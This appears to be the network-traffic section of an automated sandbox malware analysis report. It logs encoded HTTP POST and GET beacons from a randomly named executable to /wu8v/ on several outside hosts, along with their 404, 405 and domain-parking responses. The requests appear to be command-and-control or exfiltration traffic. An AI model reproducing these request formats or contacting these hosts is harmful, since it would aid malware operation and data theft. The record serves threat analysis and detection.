                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    15192.168.2.44975891.195.240.19802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:06:35.730226994 CEST10835OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.luckydomainz.shop
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.luckydomainz.shop
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.luckydomainz.shop/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 56 74 64 72 46 6e 6c 70 4c 79 6e 63 71 67 56 46 62 47 4c 4e 6c 2b 4d 6b 52 55 35 38 6d 51 62 38 65 52 57 53 75 63 66 74 51 63 47 4c 4b 64 35 55 6b 79 76 4d 75 36 43 56 30 78 46 73 49 47 71 35 31 6b 55 36 70 69 55 36 76 52 4c 4d 6a 6d 67 6f 4f 54 67 59 65 61 38 79 67 67 74 4c 4b 44 4d 33 72 79 30 66 4f 34 45 6c 4d 72 65 71 34 70 73 61 62 45 6e 4e 73 68 4f 42 43 43 4b 65 79 31 46 68 34 4c 57 30 6a 32 52 56 4b 31 71 41 45 39 61 37 69 52 4b 39 53 50 49 48 42 54 50 59 41 69 61 77 45 47 4b 4b 72 35 6d 78 5a 69 4a 61 72 43 75 4b 70 52 55 54 44 51 74 4c 72 66 6a 77 59 77 2f 36 6a 4d 54 79 57 47 75 56 67 56 35 70 6d 52 69 42 6c 63 45 43 64 46 64 51 47 72 43 50 66 69 4f 52 44 77 69 2b 42 6f 75 59 2f 36 35 5a 4f 44 56 71 77 5a 50 6a 53 42 63 4c 2f 4d 67 35 43 41 55 46 5a 64 41 31 39 78 54 51 4f 39 70 32 39 30 64 4b 47 4e 4e 51 6e 71 69 5a 42 68 53 6c 38 77 4a 74 36 36 6f 36 54 44 47 4d 68 2f 32 4f 32 50 76 73 54 4f 49 58 67 53 53 6b 78 72 30 64 66 44 4c 2f 4a 36 33 6b 41 4f 43 53 65 44 [TRUNCATED]
                                                                                                                    Data Ascii: MdtlcTm=VtdrFnlpLyncqgVFbGLNl+MkRU58mQb8eRWSucftQcGLKd5UkyvMu6CV0xFsIGq51kU6piU6vRLMjmgoOTgYea8yggtLKDM3ry0fO4ElMreq4psabEnNshOBCCKey1Fh4LW0j2RVK1qAE9a7iRK9SPIHBTPYAiawEGKKr5mxZiJarCuKpRUTDQtLrfjwYw/6jMTyWGuVgV5pmRiBlcECdFdQGrCPfiORDwi+BouY/65ZODVqwZPjSBcL/Mg5CAUFZdA19xTQO9p290dKGNNQnqiZBhSl8wJt66o6TDGMh/2O2PvsTOIXgSSkxr0dfDL/J63kAOCSeD0diOHGXQbW5t5Flg2G+x2bGm5ib2yqJywJYPfgByQhiVedXU3JOf+Un+gktnPjQuYXiYdxYiweOqKWpv9hJ4g5Kq5mQkmBSX3QtiJp/gcurQG9L2u7FsdQN8mrycllVbQao5T+FtQFdpNnM2/mHFxk78TBXeXZNnpzUjcpLdSSaVUKGPZrA3Q220ZLTnsgwjx1MqzHHooFdmxnT0yYlDdSsZLP+Gljs9wh2KPZNa+ywyg0mE0ta9ahlfSTuqSHZx+X3l9gtfIFqR8BfLMxxhMbM2CdhW7X2mZWm1GdhJAZfA7gvX8oUa8Kn7p5JdlrCcXiAzpq50rkikxf5Y0RvKeZMu42ZWii9y3LCWlaTx7y/IXJEtb+2kunspfUIM07Yc8PH6ypTQ/g1anio1RbT/Ts/ebYyImf+kG4sm7f4DFctBgsdk7adpSbG15cliaJB9+ybHDUIdXwajIxQpRi37mLZN/MQHPWByNrTXpWicCruhv7/hFJLPS3NVPY/olBb65dhrgZCKqi5ahlNQwQlJfPaqeKvDj3fxEqFLE3xQ1kBSLsy8jezlrVwEd60dyJqwcTHgXYb7kSm3sO/NYwMtC59z01553SRXnp+0Tw/4XZfoknJU/NDvC91iAkcReCKB1C3Fqr/iA1iA/JOZF65983YwRw5C9BwA6n [TRUNCATED]
                                                                                                                    May 8, 2024 14:06:36.043148041 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                                    date: Wed, 08 May 2024 12:06:35 GMT
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 556
                                                                                                                    server: NginX
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    16192.168.2.44975991.195.240.19802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:06:39.265795946 CEST460OUTGET /wu8v/?MdtlcTm=Yv1LGRM7Mjb9pBh1S0mxpOIYfAZ4/RDtaTGh+vP2adeGTIEJhl6Vpo3SkSZ8CVSt6h4P+QwQoy6FjmlMXS0oXaAW/UguTEMtgRYeILR3LZnXobcueVuNljQ=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.luckydomainz.shop
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:06:39.625897884 CEST1289INHTTP/1.1 200 OK
                                                                                                                    date: Wed, 08 May 2024 12:06:39 GMT
                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                    transfer-encoding: chunked
                                                                                                                    vary: Accept-Encoding
                                                                                                                    x-powered-by: PHP/8.1.17
                                                                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                    pragma: no-cache
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_EdhTQ/csqXsP5VLDyikruACpxQRj/vGXycnEmwVcH7qE4Y40LZFdLFnJSxBicLlLCvxd/hn5YWTuuYhDwHh83Q==
                                                                                                                    last-modified: Wed, 08 May 2024 12:06:39 GMT
                                                                                                                    x-cache-miss-from: parking-7cbf88ff6b-tlmzd
                                                                                                                    server: NginX
                                                                                                                    connection: close
                                                                                                                    Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 45 64 68 54 51 2f 63 73 71 58 73 50 35 56 4c 44 79 69 6b 72 75 41 43 70 78 51 52 6a 2f 76 47 58 79 63 6e 45 6d 77 56 63 48 37 71 45 34 59 34 30 4c 5a 46 64 4c 46 6e 4a 53 78 42 69 63 4c 6c 4c 43 76 78 64 2f 68 6e 35 59 57 54 75 75 59 68 44 77 48 68 38 33 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6c 75 63 6b 79 64 6f 6d 61 69 6e 7a 2e 73 68 6f 70 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 6c 75 [TRUNCATED]
                                                                                                                    Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_EdhTQ/csqXsP5VLDyikruACpxQRj/vGXycnEmwVcH7qE4Y40LZFdLFnJSxBicLlLCvxd/hn5YWTuuYhDwHh83Q==><head><meta charset="utf-8"><title>luckydomainz.shop&nbsp;-&nbsp;luckydomainz Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="luckydomainz.shop is your first and best source for all of the information youre looking for. Fro
                                                                                                                    May 8, 2024 14:06:39.625910044 CEST1289INData Raw: 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 6c 75 63 6b 79 64 6f 6d 61 69 6e 7a 2e 73 68 6f 70 20
                                                                                                                    Data Ascii: m general topics to more of what you would expect to find here, luckydomainz.shop has it all. We hope y1062ou find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates
                                                                                                                    May 8, 2024 14:06:39.625921011 CEST1289INData Raw: 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25
                                                                                                                    Data Ascii: hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearanc
                                                                                                                    May 8, 2024 14:06:39.625935078 CEST1289INData Raw: 6b 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e
                                                                                                                    Data Ascii: kground:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.
                                                                                                                    May 8, 2024 14:06:39.626003027 CEST1289INData Raw: 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74
                                                                                                                    Data Ascii: text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10
                                                                                                                    May 8, 2024 14:06:39.626200914 CEST1289INData Raw: 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 65
                                                                                                                    Data Ascii: n:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550
                                                                                                                    May 8, 2024 14:06:39.626213074 CEST672INData Raw: 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b
                                                                                                                    Data Ascii: r:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch inp
                                                                                                                    May 8, 2024 14:06:39.626224041 CEST1289INData Raw: 31 35 44 38 0d 0a 72 61 64 69 75 73 3a 33 34 70 78 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 2b 2e 73
                                                                                                                    Data Ascii: 15D8radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(2
                                                                                                                    May 8, 2024 14:06:39.626235008 CEST1289INData Raw: 70 3a 35 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e
                                                                                                                    Data Ascii: p:50px;position:inherit}.container-content__right{background:url("//img.sedoparking.com/templates/bg/arrows-curved.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-web
                                                                                                                    May 8, 2024 14:06:39.626328945 CEST1289INData Raw: 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 74 65 78 74 7b 70 61 64 64 69 6e 67 3a 33 70 78 20 30 20 36 70 78 20 30 3b 6d 61 72 67 69 6e 3a 2e 31 31 65 6d 20 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 38 70 78 3b
                                                                                                                    Data Ascii: r-ads-list__list-element-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#fff}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-link:link,.two-tier-ads-l
                                                                                                                    May 8, 2024 14:06:39.936451912 CEST1289INData Raw: 34 30 70 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 6e 63 2d 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 6e 63
                                                                                                                    Data Ascii: 40px;cursor:pointer}.nc-container{width:100%;text-align:center;margin-top:10px}.nc-container span{font-family:Ariel,sans-serif;font-size:16px;color:#888} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"singl


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    17192.168.2.449760203.161.46.103802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:06:45.403407097 CEST718OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.selectif.xyz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.selectif.xyz
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.selectif.xyz/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 54 7a 54 53 54 41 63 75 43 53 32 4a 51 4b 37 6c 4e 2b 5a 79 4c 6b 37 43 74 50 4f 57 4b 78 72 45 2b 41 42 52 6b 69 6a 44 4b 34 31 74 44 49 76 68 71 55 58 67 79 57 34 58 77 4c 35 67 4d 58 30 61 42 74 6f 4c 58 32 33 4b 4a 72 56 79 33 72 62 61 2b 30 2f 5a 51 67 44 55 34 57 6c 4a 2f 6e 46 78 56 56 69 45 78 4d 5a 65 33 55 33 58 58 33 4c 33 4a 75 42 4d 73 2f 37 77 38 35 31 4b 61 71 4b 52 4e 75 48 5a 37 66 45 76 51 49 6c 5a 55 67 63 33 30 58 6d 6f 38 61 72 48 50 62 31 31 44 53 2b 58 72 6c 6a 78 37 33 7a 4c 65 43 6f 76 34 5a 67 43 4b 41 72 65 6e 57 33 43 6d 58 4a 67 30 2b 6a 6b 7a 77 3d 3d
                                                                                                                    Data Ascii: MdtlcTm=TzTSTAcuCS2JQK7lN+ZyLk7CtPOWKxrE+ABRkijDK41tDIvhqUXgyW4XwL5gMX0aBtoLX23KJrVy3rba+0/ZQgDU4WlJ/nFxVViExMZe3U3XX3L3JuBMs/7w851KaqKRNuHZ7fEvQIlZUgc30Xmo8arHPb11DS+Xrljx73zLeCov4ZgCKArenW3CmXJg0+jkzw==
                                                                                                                    May 8, 2024 14:06:45.613395929 CEST533INHTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:06:45 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    18192.168.2.449761203.161.46.103802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:06:48.138953924 CEST738OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.selectif.xyz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.selectif.xyz
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.selectif.xyz/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 54 7a 54 53 54 41 63 75 43 53 32 4a 52 71 72 6c 4d 64 78 79 4e 45 37 42 69 76 4f 57 44 52 72 41 2b 41 46 52 6b 6a 6d 47 4b 71 68 74 41 71 33 68 34 56 58 67 78 57 34 58 6b 37 35 6c 49 58 30 52 42 74 6b 35 58 79 33 4b 4a 72 78 79 33 76 66 61 72 54 72 61 51 77 44 57 68 6d 6c 58 67 33 46 78 56 56 69 45 78 4d 64 6b 33 51 62 58 57 48 37 33 4b 50 42 50 69 66 37 2f 30 5a 31 4b 65 71 4b 64 4e 75 47 30 37 65 59 46 51 4b 64 5a 55 69 55 33 30 6d 6d 6e 6c 71 71 4d 4c 62 30 32 47 53 6e 73 7a 6e 32 70 2b 46 76 72 62 43 51 31 39 66 78 59 62 78 4b 4a 31 57 54 78 37 51 41 55 35 39 65 74 6f 34 50 6f 37 79 74 74 4d 6e 68 6f 4c 41 2b 54 44 30 70 39 39 33 45 3d
                                                                                                                    Data Ascii: MdtlcTm=TzTSTAcuCS2JRqrlMdxyNE7BivOWDRrA+AFRkjmGKqhtAq3h4VXgxW4Xk75lIX0RBtk5Xy3KJrxy3vfarTraQwDWhmlXg3FxVViExMdk3QbXWH73KPBPif7/0Z1KeqKdNuG07eYFQKdZUiU30mmnlqqMLb02GSnszn2p+FvrbCQ19fxYbxKJ1WTx7QAU59eto4Po7yttMnhoLA+TD0p993E=
                                                                                                                    May 8, 2024 14:06:48.345973969 CEST533INHTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:06:48 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    19192.168.2.449762203.161.46.103802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:06:50.878827095 CEST10820OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.selectif.xyz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.selectif.xyz
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.selectif.xyz/wu8v/
